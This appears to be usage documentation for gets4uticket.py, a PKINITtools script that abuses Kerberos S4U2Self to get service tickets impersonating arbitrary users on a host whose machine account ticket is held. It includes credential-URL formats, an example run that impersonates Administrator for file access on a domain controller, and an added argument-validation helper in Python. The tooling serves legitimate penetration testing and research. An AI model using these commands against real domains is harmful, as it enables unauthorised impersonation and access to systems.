Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you’ve obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url. The only accepted kerberos_connection_url for this example is one containing a ccache file, for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating; you can’t use this for delegation attacks, since it does not implement S4U2Proxy (there are plenty of tools already for that).
Install PKINITtools.
gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache
positional arguments:
kerberos_connection_url
the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
spn the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
targetuser
ccache ccache file to store the TGT ticket in
options:
-h, --help show this help message and exit
-v, --verbose
==== Extra Help ====
kerberos connection url secret types:
- Plaintext: "pw" or "pass" or "password"
- NT hash: "nt"
- RC4 key: "rc4"
- AES128/256 key: "aes"
- CCACHE file: "ccache"
- SSPI: "sspi"
Example:
- Plaintext + SOCKS5 proxy:
kerberos+password://domain\user:[email protected]/proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080
- Plaintext:
kerberos+password://domain\user:[email protected]
kerberos+pw://domain\user:[email protected]
kerberos+pass://domain\user:[email protected]
- NT hash:
kerberos+nt://domain\user:[email protected]
- SSPI:
TEST/user/sspi:@192.168.1.1
- RC4 key:
kerberos+rc4://domain\user:[email protected]
- AES key:
kerberos+aes://domain\user:[email protected]
- CCACHE file:
kerberos+ccache://domain\user:[email protected]
- KEYTAB file:
kerberos+keytab://domain\user:[email protected]
- PFX file:
kerberos+pfx://TEST.corp\Administrator:[email protected]/?certdata=test.pfx
- PFX string (b64):
kerberos+pfxstr://TEST.corp\Administrator:[email protected]/?certdata=BASE64DATA
- No auth (preauth not req):
kerberos+none://TEST.corp\[email protected]/
(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO Success!
2021-07-28 10:09:13,696 minikerberos INFO Done!
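The help text above spells out two argument rules that are easy to get wrong: the kerberos_connection_url must use the kerberos+<secret-type>://domain\user:secret@<dc>[/params] layout (and, for gets4uticket.py, the secret type must be ccache), and the SPN must name the server by hostname, not IP. The following is an added example, not code from PKINITtools or minikerberos, that parses both arguments and reports those violations before the tool is ever run. The secret-type aliases and parameter forms come from the extra-help listing; the SSPI form (TEST/user/sspi:@host) is not handled. All domain names, account names, ccache file names and addresses in it are constructed sample values.

```python
"""Added example: validate gets4uticket.py's kerberos_connection_url and SPN
arguments against the rules stated in its help text. Not part of PKINITtools."""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Secret-type aliases listed under "kerberos connection url secret types"
SECRET_TYPES = {
    "pw": "password", "pass": "password", "password": "password",
    "nt": "nt", "rc4": "rc4", "aes": "aes", "ccache": "ccache",
    "sspi": "sspi", "keytab": "keytab", "pfx": "pfx", "pfxstr": "pfxstr",
    "none": "none",
}
# Types whose secret (or secret file name) sits in the user:secret part of the URL
SECRET_IN_URL = {"password", "nt", "rc4", "aes", "ccache", "keytab"}


@dataclass
class KerberosUrl:
    secret_type: str
    domain: str
    username: str
    secret: str
    dc_host: str
    params: Dict[str, str] = field(default_factory=dict)

    @property
    def is_machine_account(self) -> bool:
        # Machine accounts carry a trailing '$' (e.g. victimhostname$)
        return self.username.endswith("$")


def parse_kerberos_url(url: str) -> KerberosUrl:
    """Parse kerberos+<type>://domain\\user:secret@<dc>[/k=v&k=v | /?k=v]."""
    scheme, sep, rest = url.partition("://")
    if not sep or not scheme.lower().startswith("kerberos+"):
        raise ValueError("expected kerberos+<secret-type>://...")
    alias = scheme[len("kerberos+"):].lower()
    if alias not in SECRET_TYPES:
        raise ValueError(f"unknown secret type {alias!r}")
    secret_type = SECRET_TYPES[alias]

    # Authority runs up to the first '/'; anything after it carries parameters
    authority, _, tail = rest.partition("/")
    userinfo, at, dc_host = authority.rpartition("@")  # rpartition: secrets may contain '@'
    if not at or not dc_host:
        raise ValueError("missing @<domaincontroller-ip>")
    domain, backslash, user_secret = userinfo.partition("\\")
    if not backslash or not domain:
        raise ValueError("expected domain\\user before the ':'")
    username, _, secret = user_secret.partition(":")
    if not username:
        raise ValueError("missing user name")
    if secret_type in SECRET_IN_URL and not secret:
        raise ValueError(f"secret type {secret_type!r} needs a value after ':'")

    # Parameters appear as /key=val&key=val (proxy form) or /?key=val (pfx form)
    params: Dict[str, str] = {}
    for pair in tail.lstrip("?").split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    if secret_type in ("pfx", "pfxstr") and "certdata" not in params:
        raise ValueError("pfx/pfxstr URLs need a certdata parameter")
    return KerberosUrl(secret_type, domain, username, secret, dc_host, params)


def parse_spn(spn: str) -> Tuple[str, str, str]:
    """Split <service>/<server-hostname>@<domain>; reject an IP address as the host."""
    service, slash, rest = spn.partition("/")
    host, at, domain = rest.partition("@")
    if not (slash and service and at and host and domain):
        raise ValueError("SPN must be <service>/<server-hostname>@<domain>")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return service, host, domain  # a hostname, as the help text requires
    raise ValueError("SERVER'S HOSTNAME MUST BE USED, NOT IP")


def check_s4u_arguments(url: str, spn: str) -> dict:
    """Apply gets4uticket.py's stated rules; errors block a run, warnings are advisory."""
    result: dict = {"errors": [], "warnings": [], "url": None, "spn": None}
    ku: Optional[KerberosUrl] = None
    try:
        ku = parse_kerberos_url(url)
        result["url"] = ku
        if ku.secret_type != "ccache":
            result["errors"].append("gets4uticket.py only accepts a kerberos+ccache:// URL")
    except ValueError as exc:
        result["errors"].append(f"kerberos_connection_url: {exc}")
    try:
        result["spn"] = parse_spn(spn)
    except ValueError as exc:
        result["errors"].append(f"spn: {exc}")
    if ku is not None and result["spn"] is not None:
        warnings: List[str] = result["warnings"]
        if not ku.is_machine_account:
            warnings.append("URL user is not a machine account (no trailing '$')")
        # S4U2Self only yields a ticket usable on the machine account's own host,
        # whose short name is normally the account name without the '$'
        if result["spn"][1].split(".")[0].lower() != ku.username.rstrip("$").lower():
            warnings.append("SPN host does not match the machine account in the URL")
    return result


if __name__ == "__main__":
    # Constructed sample values modelled on the example run above
    sample_url = r"kerberos+ccache://testsegment.local\s2019dc$:dc.ccache@10.0.0.1"
    print(check_s4u_arguments(sample_url, "cifs/s2019dc.testsegment.local@testsegment.local"))
    print(check_s4u_arguments(sample_url, "cifs/10.0.0.5@testsegment.local"))
```

Running the module prints an empty error list for the hostname SPN and a "NOT IP" error for the second call; parse_kerberos_url on its own accepts every kerberos+ form from the extra-help list, so the same parser can front other minikerberos-style tools that do allow password, hash or PFX secrets.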